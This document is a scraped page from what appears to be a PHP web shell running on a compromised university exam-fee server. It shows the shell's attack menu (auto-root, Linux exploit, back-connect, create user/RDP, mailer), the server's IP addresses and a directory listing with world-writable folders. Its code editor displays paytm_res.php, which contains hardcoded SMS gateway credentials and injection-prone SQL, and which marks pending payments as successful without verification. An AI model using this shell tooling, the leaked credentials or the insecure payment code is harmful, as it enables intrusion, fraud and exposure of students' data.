Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.224.73.107
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
reva /
[ HOME SHELL ]
Name
Size
Permission
Action
Excel_Writer
[ DIR ]
drwxr-xr-x
Excel_reader
[ DIR ]
drwxr-xr-x
JQGrid3.5
[ DIR ]
drwxr-xr-x
PHPExcel
[ DIR ]
drwxrwxr-x
Report_details
[ DIR ]
drwxr-xr-x
Report_details03.05.2016
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxrwxrwx
copodoc
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxr-xr-x
css_old
[ DIR ]
drwxr-xr-x
cssold
[ DIR ]
drwxr-xr-x
custom_js
[ DIR ]
drwxrwxr-x
custom_js_old_21082021
[ DIR ]
drwxr-xr-x
custom_src
[ DIR ]
drwxrwxr-x
custom_src_old_21082021
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
grid_display_files
[ DIR ]
drwxr-xr-x
halltickets
[ DIR ]
drwxrwxrwx
html_modules
[ DIR ]
drwxr-xr-x
html_modules03.05.2016
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
imported_files
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxr-xr-x
js03.05.2016
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
maya-pdf
[ DIR ]
drwxr-xr-x
misc_files
[ DIR ]
drwxrwxrwx
schema
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
src03.05.2016
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxr-xr-x
tarka_pdf_latest
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
tmpphotos
[ DIR ]
drwxrwxrwx
user_images
[ DIR ]
drwxr-xr-x
validation_files
[ DIR ]
drwxr-xr-x
.htaccess
602
B
-rwxr-xr-x
Annexure 1 Process for IA mark...
933.28
KB
-rw-rw-r--
Annexure 2_Guidelines for Crea...
1.23
MB
-rw-rw-r--
Annexure 3_Guidelines for Stud...
1.04
MB
-rw-rw-r--
Demo_Of_Exam_Automation.mp4
92.39
MB
-rwxr-xr-x
IA Schedule - 2021-22 - Revise...
274.86
KB
-rw-rw-r--
MainPage.html
15.98
KB
-rwxr-xr-x
MainPage03.05.2016.html
11.04
KB
-rwxr-xr-x
MainPage20092016.html
12.3
KB
-rwxr-xr-x
MainPagepopup.html
7.05
KB
-rwxr-xr-x
MainPagepopup03.05.2016.html
7.05
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
919
B
-rwxr-xr-x
collegeInfoPopup.html
3.76
KB
-rwxr-xr-x
docverify.php
818
B
-rwxr-xr-x
enableht.php
2.56
KB
-rwxr-xr-x
getQPdet.php
5.34
KB
-rwxr-xr-x
getQPdet_dud.php
7.14
KB
-rwxr-xr-x
homepage.html
3.05
KB
-rwxr-xr-x
homepage03.05.2016.html
2.76
KB
-rwxr-xr-x
homepage20092016.html
3.35
KB
-rwxr-xr-x
index.html
7.06
KB
-rwxr-xr-x
index03.05.2016.html
5.12
KB
-rwxr-xr-x
index20092016.html
5.88
KB
-rwxr-xr-x
indexlatest.html
5.16
KB
-rwxr-xr-x
indexlogin.html
5.75
KB
-rwxr-xr-x
indexlogin20092016.html
5.81
KB
-rwxr-xr-x
indexold.html
5.19
KB
-rwxr-xr-x
mainpage.htm
31.7
KB
-rwxr-xr-x
paytm_res.php
6.48
KB
-rwxr-xr-x
reva_api.php
2.2
KB
-rwxr-xr-x
sumreport.xls
77.75
KB
-rwxr-xr-x
valdet.php
12.01
KB
-rwxr-xr-x
valdet_dud.php
10
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : paytm_res.php
<?php include("sendsmsapi.php"); ini_set('max_execution_time', 600); include("/var/www/config.php"); $servername = SERVERNAME; $username = USERNAME; $password = PASSWORD; $dbname = "logisys3_reva"; /*$servername = "localhost"; $username = "root"; $password = ""; $dbname = "resultsg_kus";*/ $conn = new mysqli($servername, $username, $password, $dbname); //include("/var/www/config.php"); $servername = SERVERNAME; $username = USERNAME; $password = PASSWORD; /* $servername = "localhost"; $username = "root"; $password = "";*/ $dbname = "logisys3_comexam"; $conn1 = new mysqli($servername, $username, $password, $dbname); $query = "select ac.appno, ac.fregno, ac.FPAYMENTSTATUS, ac.FPAYGATEWAY,kp.fname as fname, ac.FDATE, ac.fcollcode, ac.fdegree, kp.ftranid from appcandsum ac inner join pg_txn kp on ac.appno = kp.fappno and ac.fregno = kp.fregno where ifnull(ac.FPAYMENTSTATUS,'') <> 'success'"; $resultm = $conn->query($query); if (mysqli_num_rows($resultm) > 0) { while($row = mysqli_fetch_assoc($resultm)) { $productinfo = $row['appno']; $regno = $row['fregno']; $paytm = $row['FPAYGATEWAY']; $degree = $row['fdegree']; $collcode = $row['fcollcode']; $fname = $row['fname']; $ftranid = $row['ftranid'];//ftranid //$firstname = "paytm"; $update="update appcandsum set FPAYMENTREMARKS='{$ftranid}',FPAYMENTSTATUS='success', FPAYMENTCONFIRM='success',FACKDATE=now(),FACKUSER='{$fname}',FPAYGATEWAY = '{$fname}' where APPNO='{$productinfo}'"; $result = $conn->query($update); $update_cand_sum = "UPDATE appcandsum a,candsum c SET c.FEXAMFEEA=if(ifnull(c.FEXAMFEEA,0) <=0,ifnull(a.FEXAMFEEA,0),ifnull(c.FEXAMFEEA,0)), c.FEXAMFEEB=if(ifnull(c.FEXAMFEEB,0) <=0,ifnull(a.FEXAMFEEB,0),ifnull(c.FEXAMFEEB,0)), c.FEXAMFEEC=if(ifnull(c.FEXAMFEEC,0) <=0,ifnull(a.FEXAMFEEC,0),ifnull(c.FEXAMFEEC,0)), c.FEXAMFEED=if(ifnull(c.FEXAMFEED,0) <=0,ifnull(a.FEXAMFEED,0),ifnull(c.FEXAMFEED,0)), c.FEXAMFEEE=if(ifnull(c.FEXAMFEEE,0) <=0,ifnull(a.FEXAMFEEE,0),ifnull(c.FEXAMFEEE,0)), c.FEXAMFEEF=if(ifnull(c.FEXAMFEEF,0) <=0,ifnull(a.FEXAMFEEF,0),ifnull(c.FEXAMFEEF,0)), c.FEXAMFEEG=if(ifnull(c.FEXAMFEEG,0) <=0,ifnull(a.FEXAMFEEG,0),ifnull(c.FEXAMFEEG,0)), c.FEXAMFEEH=if(ifnull(c.FEXAMFEEH,0) <=0,ifnull(a.FEXAMFEEH,0),ifnull(c.FEXAMFEEH,0)), c.FEXAMFEEI=if(ifnull(c.FEXAMFEEI,0) <=0,ifnull(a.FEXAMFEEI,0),ifnull(c.FEXAMFEEI,0)), c.FEXAMFEEJ=if(ifnull(c.FEXAMFEEJ,0) <=0,ifnull(a.FEXAMFEEJ,0),ifnull(c.FEXAMFEEJ,0)), c.FTOTALFEE=a.FTOTALFEE, c.frecptdate = date(now()) WHERE a.fregno=c.FREGNO AND a.APPNO='{$productinfo}' and a.FCOLLCODE='{$collcode}'"; $result = $conn->query($update_cand_sum); $update_cand_appCand = "update canddet c, appcanddet t set c.finserted = t.finserted, c.fpresent = t.fpresent where c.fdegree = t.fdegree and c.fexamno = t.fexamno and c.fregno = t.fregno and c.fsubcode = t.fsubcode and c.fdegree = '{$degree}' and c.fregno = '{$regno}' and t.APPNO='{$productinfo}' and ifnull(c.fpresent,'') <> 'P'"; $result = $conn->query($update_cand_appCand); $insert_canddet ="insert into canddet(fdegree,FEXAMNO, FCOLLCODE, FREGNO, FSUBCODE, FINSERTED, FPRESENT, FYEAR, FEXAMTYPE) select fdegree, FEXAMNO, FCOLLCODE,FREGNO, FSUBCODE,FINSERTED, FPRESENT, FYEAR,FEXAMTYPE from appcanddet where fregno = '{$regno}' and appno ='{$productinfo}' and CONCAT(fdegree,fexamno,fregno,fsubcode) not in(select CONCAT(fdegree,fexamno,fregno,fsubcode) from canddet where fregno = '{$regno}') "; //$lobj_insert_canddet = $aobj_context->mobj_db->Execute($insert_canddet); $result = $conn->query($insert_canddet); $update_studfee = "update studfee s, appstudfee a set s.famount = a.famount, s.flogdate = a.flogdate where s.fdegree = a.fdegree and s.fexamno = a.fexamno and s.fregno = a.fregno and s.ffeecode = a.ffeecode and s.fregno = '{$regno}' and a.appno ='{$productinfo}'"; $result = $conn->query($update_studfee); $insert_studfee = "insert into studfee(fdegree,fexamno,fcollcode,fregno,ffeecode,famount,flogdate) select fdegree,fexamno,fcollcode,fregno,ffeecode,famount,flogdate from appstudfee where fregno = '{$regno}' and appno ='{$productinfo}' and CONCAT(fdegree,fexamno,fregno,ffeecode) not in(select CONCAT(fdegree,fexamno,fregno,ffeecode) from studfee where fdegree = '{$degree}' and fregno = '{$regno}')"; //var_dump($insert_studfee); echo $regno; $result = $conn->query($insert_studfee); $get_app_cand_det="SELECT a.FDEGREE,a.FEXAMNO,a.FCOLLCODE, a.FREGNO,a.FSUBCODE,a.FINSERTED,a.FPRESENT,a.FYEAR,a.FEXAMTYPE,concat('Message from Bengaluru Central University : ', ' Dear ',s.fname,' (Reg. no. : ',s.fregno,' , Stud. id. : ',s.fstudid,'),', ' Rs.',FLOOR(c.FTOTALFEE),'/- is received at university. Your application no. is ',c.appno, '. keep this information for future reference.',' Sent Time: ',time(now())) as message FROM appcanddet a inner join student s on a.fdegree = s.fdegree and s.fcollcode = a.fcollcode and a.fregno = s.fregno inner join appcandsum c on a.fdegree = c.fdegree and a.fcollcode = c.fcollcode and a.fregno = c.fregno and a.appno = c.appno WHERE c.APPNO='{$productinfo}'"; $result = $conn->query($get_app_cand_det); $text = ""; $row = mysqli_fetch_assoc($result); $text = $row['message']; $get_data = "select fmobileno from masuser where fregno = '{$regno}' and funivcode = '041'"; $result1=$conn1->query($get_data); $to = ""; if (mysqli_num_rows($result1) > 0) { // output data of each row $dbnames = array(); while($row = mysqli_fetch_assoc($result1)) { $to = $row['fmobileno']; } } $username = 'logisyhttp'; $password = 'Logis986'; $from = 'UNISOL'; $category = ''; var_dump($text); echo "-".$to."-"."<br/>"; //$smsresp = sendsmaapi($username,$password,$from,$to,$text,$category); //echo "-".$smsresp."<br/>"; //$strInsertQuery = "insert into smslog(funivcode, fregno,fmobileno, freasoncode, fguid, fenttype, fstatus,fackdate, facktime,fremarks) values('041','{$regno}','{$to}','PG','{$smsresp}','PG','{$smsresp}',now(),now(),'Paytm')"; //$result1=$conn1->query($strInsertQuery); } } ?>
Close